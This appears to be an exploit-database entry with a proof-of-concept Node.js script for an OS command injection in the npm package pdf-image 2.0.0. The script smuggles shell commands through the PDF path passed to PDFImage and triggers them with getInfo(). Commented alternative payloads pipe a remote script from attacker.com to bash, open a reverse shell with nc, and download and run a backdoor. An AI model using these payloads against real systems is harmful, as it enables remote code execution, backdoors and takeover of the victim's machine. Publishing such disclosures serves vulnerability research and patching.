Share
## https://sploitus.com/exploit?id=PACKETSTORM:219847
==================================================================================================================================
    | # Title     : pdf-image 2.0.0 OS Command Injection via Unescaped PDF Path in PDFImage.getInfo()                                |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.npmjs.com/package/pdf-image                                                                          |
    ==================================================================================================================================
    
    [+] Summary    : In pdf-image version 2.0.0, a security issue allows OS command injection when untrusted input is passed to the PDFImage constructor and later processed by methods such as getInfo().
    
    
    [+] POC        :  
    
    // exploit.js
    const { PDFImage } = require("pdf-image");
    const maliciousPdfPath = 'test.pdf"; touch /tmp/pwned.txt; echo "';
    
    // const maliciousPdfPath = 'test.pdf"; curl http://attacker.com/shell.sh | bash; echo "';
    // const maliciousPdfPath = 'test.pdf"; nc -e /bin/sh attacker.com 4444; echo "';
    // const maliciousPdfPath = 'test.pdf"; wget http://attacker.com/backdoor -O /tmp/backdoor && chmod +x /tmp/backdoor && /tmp/backdoor; echo "';
    
    console.log("[+] CVE-2026-26830 - PDFImage OS Command Injection Exploit");
    console.log("[+] Malicious PDF path:", maliciousPdfPath);
    console.log("[+] Creating PDFImage instance...");
    
    const pdfImage = new PDFImage(maliciousPdfPath);
    
    console.log("[+] Calling getInfo() to trigger the vulnerability...");
    
    pdfImage.getInfo()
        .then((info) => {
            console.log("[!] getInfo() succeeded unexpectedly (injection might still have worked)");
            console.log("Info:", info);
        })
        .catch((err) => {
            console.log("[!] getInfo() failed (but command may have executed before the error)");
            console.log("Error:", err.message);
        })
        .finally(() => {
            console.log("[*] Check if the command executed by running: cat /tmp/pwned.txt");
            console.log("[*] If the file exists, the exploit was successful!");
        });
    	
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================